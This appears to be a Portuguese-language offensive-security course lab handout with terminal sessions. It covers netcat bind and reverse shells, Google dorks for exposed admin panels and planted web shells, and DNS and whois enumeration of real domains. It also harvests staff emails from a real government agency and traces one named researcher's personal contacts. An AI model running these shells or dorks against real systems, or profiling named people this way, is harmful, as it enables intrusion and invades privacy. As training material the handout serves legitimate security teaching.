1. Laboratório do Curso de Segurança Ofensiva
Netcat e Enumeração (Google Hacking, Whois e DNS)
1. NETCAT
a) Ajuda
root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands
as `-e'; use /bin/sh to exec [dangerous!!]
-e filename
program to exec after connect [dangerous!!]
-b
allow broadcasts
-g gateway
source-routing hop point[s], up to 8
-G num
source-routing pointer: 4, 8, 12, ...
-h
this cruft
-i secs
delay interval for lines sent, ports scanned
-k
set keepalive option on socket
-l
listen mode, for inbound connects
-n
numeric-only IP addresses, no DNS
-o file
hex dump of traffic
-p port
local port number
-r
randomize local and remote ports
-q secs
quit after EOF on stdin and delay of secs
-s addr
local source address
-T tos
set Type Of Service
-t
answer TELNET negotiation
-u
UDP mode
-v
verbose [use twice to be more verbose]
-w secs
timeout for connects and final net reads
-z
zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp-data').
root@bt:~/lab_bash-script#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
1
2. b) Banner grabbing
Verificando portas abertas e lendo banners
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
c) CHATT Simples
No Backtrack
nc -lvp 4444
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
2
3. No Windows XP-SP2
nc -nv 172.16.49.130 4444
Basta digitar qualquer coisa em qualquer uma das máquinas
d) Administração Remota
- BIND SHEL
No BT localizado na rede externa
root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
No maquina windows XP-SP2 na rede interna
C:>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
3
4. - REVERSE SHELL – NC
No BT localizado na rede externa
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
Na máquina windows XP-SP2 na rede interna
C:>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open
Resultado no BT
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:>hostname
hostname
CTP028
C:>
e) Port Scan
BT externo scaneando o Firewall (portas 21 a 30)
root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
4
5. f) Transferência de Arquivos
BT externo scaneando o Firewall (portas 21 a 30)
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224
No windows XP-SP2 na rede interna
C:>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open
Resultado
root@bt:~# ls
Desktop lab_bash-script output.txt rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
5
6. 2. Google Search
google search operators - verificar site operator e outros
site:offensive-security.com - ver quantas pag web tem o domínio - paginas indexadas
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
6
14. Software de videoconf
intext:"Videoconference Management System" ext:htm
phpmyadmin aberto
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
14
15. Norton AV for gateways
inurl:"8003/Display?what="
contatos MSN
filetype:ctt "msn"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
15
16. Kickstart
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br
CUIDADO!!!!!!
backdoor apache
intitle:r57 shell filetype:php
Site com backdoor plantado - antichat no title
intitle:"Antichat Shell" "disable functions"
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
16
17. 3. Google Search Social
aeoi.org.ir puro no google - ver emails
utilizar theharvester.py (script em python no BT)
root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b
google
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
Searching 200 results...
[+] Emails found:
-----------------hkazemian@aeoi.org.ir
sjahmadi@aeoi.org.ir
smshirvani@aeoi.org.ir
mmostaedi@aeoi.org.ir
AA37120067@aeoi.org.ir
jrahighi@aeoi.org.ir
sabolhosseini@aeoi.org.ir
mghannadi@aeoi.org.ir
rd@aeoi.org.ir
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
17
18. usar hkazemian@aeoi.org.ir
é um pesquisador, tem email yahoo
usar hkazemian@yahoo.com
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
18
19. ver SPAG Zeolite
end da empress tel de contato e outro email do gmail
- procurar foto
usar hosseinkazemian@gmail.com - procurando apto veja telefone
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
19
22. Consulta whois
root@bt:~# whois checkpoint.com | more
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: CHECKPOINT.COM
IP Address: 216.200.241.66
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Domain Name: CHECKPOINT.COM
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
Status: clientTransferProhibited
Updated Date: 30-may-2012
Creation Date: 29-mar-1994
Expiration Date: 30-mar-2018
Administrative Contact, Technical Contact:
Admin, DNS
hostmaster@CHECKPOINT.COM
Check Point Software Technologies Ltd.
3A Jabotinsky St.
Ramat-Gan, 52520
IL
+972-3-7534555 fax: +972-3-5759256
Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.
Domain servers in listed order:
NS2.CHECKPOINT.COM
NS6.CHECKPOINT.COM
NS8.CHECKPOINT.COM
NS9.CHECKPOINT.COM
206.184.151.195
194.29.32.199
216.228.148.29
194.29.38.64
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
22
23. Consulta Reversa whois
root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.200.241.66"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
#
http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=
netref2
#
CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1)
216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 216.200.255.255
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
23
24. 5. DNS
Consultas Manuais
root@bt:~# nslookup www.checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
Consulta de Servidor de Email e de Nomes do domínio
root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 sami.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:
172.16.49.2
Address:
172.16.49.2#53
Non-authoritative answer:
checkpoint.com nameserver = ns2.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns9.checkpoint.com.
checkpoint.com nameserver = ns1.checkpoint.com.
Authoritative answers can be found from:
>
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
24
25. - DNS Information Gathering
1- forward lookup BF - tentar acertar nomes validos
root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#
- usar script1.sh no BT para FB (sem manipulação)
root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done
- usar script2.sh no BT para FB ("has address")
root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
25
26. - usar script3.sh no BT para FB (só IPs)
root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66
2- reverse lookup BF
- Tentar resolução Reversa
root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain
name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
26
27. 3- Zone transfer
root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:
Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.
------tentar com todos servidores de nomes - (primário e secundários)
------fazer com aeoi.org.ir e estacio.br
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
27
28. Usar /pentest/enumeration/dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt dnsenum.pl dns.txt README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br
5
IN A
200.216.152.71
Name Servers:
ns1.estacio.br
ns2.estacio.br
5
5
IN A
IN A
200.216.152.249
200.216.152.250
Mail (MX) Servers:
Mail.Global.FrontBridge.com
5
IN A
216.32.180.22
Mail.Global.FrontBridge.com
5
IN A
216.32.181.178
estacio.br
1800 IN TXT
estacio.br
1800 IN A
200.216.152.71
1989163337.estacio.br
1800 IN CNAME
mail._domainkey.estacio.br
14400 IN TXT
agenda.estacio.br
1800 IN A
200.216.152.71
agendaconselho.estacio.br
1800 IN A
200.216.152.71
aluno.estacio.br
1800 IN MX
biblioteca.estacio.br
1800 IN CNAME
bibliotecasonora.estacio.br
1800 IN A
200.216.152.90
blogdopresidente.estacio.br
1800 IN A
200.216.152.149
bquestoes.estacio.br
1800 IN A
200.216.152.63
adm.bquestoes.estacio.br
1800 IN A
200.216.152.62
provas.bquestoes.estacio.br
1800 IN A
200.216.152.63
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
28